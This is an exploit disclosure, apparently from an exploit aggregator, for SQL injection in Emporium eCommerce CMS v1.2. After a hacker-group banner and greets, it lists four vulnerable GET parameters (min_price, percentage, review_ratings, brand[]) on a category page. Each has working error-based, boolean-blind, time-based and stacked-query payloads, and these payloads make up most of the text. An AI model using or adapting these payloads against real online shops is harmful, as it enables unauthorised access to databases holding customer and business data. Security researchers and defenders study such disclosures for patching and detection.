## https://sploitus.com/exploit?id=1337DAY-ID-37847
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ C r a C k E r โโ
โโ T H E C R A C K O F E T E R N A L M I G H T โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโ From The Ashes and Dust Rises An Unimaginable crack.... โโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ [ Exploits ] โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: Author : CraCkEr โ โ :
โ Website : mybizcms.com โ โ โ
โ Vendor : mybizcms โ โ โ
โ Software : Emporium eCommerce - โ โ โ
โ Online Shopping CMS v 1.2 โ โ Emporium eCommerce โ
โ Vuln Type: Remote SQL Injection โ โ โ
โ Method : GET โ โ is a complete online โ
โ Critical : High [โโโโโโโโ] โ โ shopping platform for all your needs โ
โ Impact : Database Access โ โ โ
โ โ โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ B4nks-NET irc.b4nks.tk #unix โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: :
โ Release Notes: โ
โ โโโโโโโโโโโโโ โ
โ Typically used for remotely exploitable vulnerabilities that can lead to โ
โ system compromise. โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Greets:
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost
CryptoJob (Twitter) twitter.com/CryptozJob
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ ยฉ CraCkEr 2022 โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
There's 4 parameters Vulnerable to SQL Injection in /categories/other-categories?
GET parameter 'min_price' is vulnerable
---
Parameter: min_price (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: min_price=(UPDATEXML(5880,CONCAT(0x2e,0x7176787a71,(SELECT (ELT(5880=5880,1))),0x716b707071),2936))&max_price=145000&storage[]=41
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: min_price=(SELECT 3031 FROM (SELECT(SLEEP(5)))qWqF)&max_price=145000&storage[]=41
---
GET parameter 'percentage' is vulnerable.
---
Parameter: percentage (GET)
Type: boolean-based blind
Title: MySQL boolean-based blind - Parameter replace (MAKE_SET)
Payload: percentage=MAKE_SET(4728=4728,5649)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: percentage=40 AND (SELECT 8890 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(8890=8890,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: percentage=40 AND (SELECT 9724 FROM (SELECT(SLEEP(5)))chdS)
---
GET parameter 'review_ratings' is vulnerable
---
Parameter: review_ratings (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: review_ratings=4 AND (SELECT 5450 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(5450=5450,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: review_ratings=4 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))lpXn)
---
GET parameter 'brand[]' is vulnerable
---
Parameter: brand[] (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: brand[]=15') AND 3512=3512 AND ('Othl'='Othl
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: brand[]=15');SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: brand[]=15') AND (SELECT 9038 FROM (SELECT(SLEEP(5)))hyaE) AND ('KJgc'='KJgc
---